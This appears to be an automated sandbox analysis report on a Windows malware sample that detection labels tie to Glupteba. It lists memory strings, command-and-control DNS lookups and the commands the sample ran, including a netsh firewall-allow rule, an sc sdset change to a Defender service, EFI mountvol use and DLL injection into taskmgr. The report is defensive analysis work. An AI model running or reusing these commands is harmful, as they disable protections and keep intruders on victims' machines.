            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: f6oNLRKHUy.exe, 00000003.00000002.372230565.00000000118D4000.00000004.00000001.sdmpBinary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProSELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) cpu e5-2673 v3 @ 2.40ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) cpu e5-2673 v4 @ 2.30ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) platinum 8171m cpu @ 2.60ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzHKEY_USERS\ngineer\Desktop\f6oNLRKHUy.exe" "C:\Users\user\Desktop\f6oNLRKHUy.exe" S-1-5-21-3853321935-2125563209-4053062332-1002FirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\f6onlrkhuy.exeintel(r) core(tm)2 cpu 6600 @ 2.40 ghzcsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exeWmiPrvSE.exedllhost.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exedllhost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
            Source: svchost.exe, 0000001D.00000002.621901154.0000029C4C000000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exef6onlrkhuy.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exef6onlrkhuy.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
            Source: csrss.exeBinary or memory string: AhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6
            Source: f6oNLRKHUy.exe, 00000003.00000002.372387412.00000000118FC000.00000004.00000001.sdmpBinary or memory string: Registrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exefiKKrsNZWTjxp.exefikkrsnzwtjxp.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exef6oNLRKHUy.exeTrustedInstaller.exetrustedinstaller.exef6oNLRKHUy.exexenevtchnfragrantbutterflyfragrantbutterfly.exeP
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exe[system process]vmsrvc.exe
            Source: csrss.exeBinary or memory string: ridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWin
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A009E1D4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B9D3C GetProcessHeap,34_2_00007FF6A00B9D3C
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009D8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,34_2_00007FF6A009D8BC
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A009E1D4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009E37C SetUnhandledExceptionFilter,34_2_00007FF6A009E37C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A00A543C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009DE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF6A009DE24

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Contains functionality to inject threads in other processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00927F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,34_2_00007FF6A00927F0
            Performs DNS TXT record lookupsShow sources
            Source: TrafficDNS traffic detected: queries for: trumops.com
            Source: TrafficDNS traffic detected: queries for: logs.trumops.com
            Source: TrafficDNS traffic detected: queries for: 8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com
            Source: TrafficDNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'Jump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to behavior
            Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmpBinary or memory string: &Program Manager
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_00007FF6A00B9A24
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,34_2_00007FF6A00B0A8C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,34_2_00007FF6A00B933C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,34_2_00007FF6A00B940C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_00007FF6A00B94A4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,34_2_00007FF6A00B96F0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: try_get_function,GetLocaleInfoW,34_2_00007FF6A00B0FD0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,34_2_00007FF6A00B8FF0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_00007FF6A00B9848
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,34_2_00007FF6A00B98F8
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B5140 cpuid 34_2_00007FF6A00B5140
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009E0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00007FF6A009E0C8

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Uses netsh to modify the Windows network and firewall settingsShow sources
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
            Modifies the windows firewallShow sources
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Remote Access Functionality:

            barindex
            Yara detected Metasploit PayloadShow sources
            Source: Yara matchFile source: 31.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.f6oNLRKHUy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.f6oNLRKHUy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 24.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.426639210.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation21Windows Service1Windows Service1Disable or Modify Tools2Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection112Obfuscated Files or Information1Input Capture1File and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Software Packing11Security Account ManagerSystem Information Discovery54SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsService Execution1Logon Script (Mac)Registry Run Keys / Startup Folder11Masquerading33NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol25SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion4LSA SecretsSecurity Software Discovery261SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 506223 Sample: f6oNLRKHUy.exe Startdate: 20/10/2021 Architecture: WINDOWS Score: 100 79 server12.trumops.com 2->79 101 Antivirus detection for URL or domain 2->101 103 Multi AV Scanner detection for dropped file 2->103 105 Multi AV Scanner detection for submitted file 2->105 107 10 other signatures 2->107 11 f6oNLRKHUy.exe 16 2->11         started        14 csrss.exe 2->14         started        16 csrss.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 119 Modifies the windows firewall 11->119 121 Drops PE files with benign system names 11->121 21 f6oNLRKHUy.exe 11 2 11->21         started        25 csrss.exe 14->25         started        27 csrss.exe 16->27         started        81 127.0.0.1 unknown unknown 18->81 83 192.168.2.1 unknown unknown 18->83 29 csrss.exe 18->29         started        signatures6 process7 file8 77 C:\Windows\rss\csrss.exe, PE32 21->77 dropped 109 Drops executables to the windows directory (C:\Windows) and starts them 21->109 111 Creates an autostart registry key pointing to binary in C:\Windows 21->111 31 csrss.exe 4 8 21->31         started        36 cmd.exe 1 21->36         started        signatures9 process10 dnsIp11 85 runmodes.com 104.21.34.203, 443, 49754, 49756 CLOUDFLARENETUS United States 31->85 87 server12.trumops.com 104.21.79.9, 443, 49755 CLOUDFLARENETUS United States 31->87 89 6 other IPs or domains 31->89 69 C:\Windows\windefender.exe, PE32 31->69 dropped 71 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 31->71 dropped 73 C:\Users\...73tQuerySystemInformationHook.dll, PE32+ 31->73 dropped 75 5 other files (none is malicious) 31->75 dropped 91 Multi AV Scanner detection for dropped file 31->91 93 Machine Learning detection for dropped file 31->93 95 Uses shutdown.exe to shutdown or reboot the system 31->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 31->97 38 injector.exe 31->38         started        41 windefender.exe 31->41         started        43 schtasks.exe 1 31->43         started        49 6 other processes 31->49 99 Uses netsh to modify the Windows network and firewall settings 36->99 45 netsh.exe 3 36->45         started        47 conhost.exe 36->47         started        file12 signatures13 process14 signatures15 113 Multi AV Scanner detection for dropped file 38->113 115 Contains functionality to inject threads in other processes 38->115 51 conhost.exe 38->51         started        53 cmd.exe 41->53         started        55 conhost.exe 41->55         started        57 conhost.exe 43->57         started        117 Creates files in the system32 config directory 45->117 59 conhost.exe 49->59         started        61 conhost.exe 49->61         started        63 conhost.exe 49->63         started        65 3 other processes 49->65 process16 process17 67 sc.exe 53->67         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            f6oNLRKHUy.exe31%MetadefenderBrowse
            f6oNLRKHUy.exe52%ReversingLabsWin32.Hacktool.PowerSploit
            f6oNLRKHUy.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\rss\csrss.exe100%Joe Sandbox ML
            B:\EFI\Boot\old.efi (copy)0%ReversingLabs
            B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
            C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
            C:\EFI\Boot\bootx64.efi0%ReversingLabs
            C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll46%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll59%ReversingLabsWin64.Trojan.Glupject
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe73%ReversingLabsWin64.Trojan.Glupteba
            C:\Windows\rss\csrss.exe31%MetadefenderBrowse
            C:\Windows\rss\csrss.exe52%ReversingLabsWin32.Hacktool.PowerSploit
            C:\Windows\windefender.exe29%MetadefenderBrowse
            C:\Windows\windefender.exe57%ReversingLabsWin32.Trojan.WinGoRanumBot

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.0.f6oNLRKHUy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            31.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            38.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
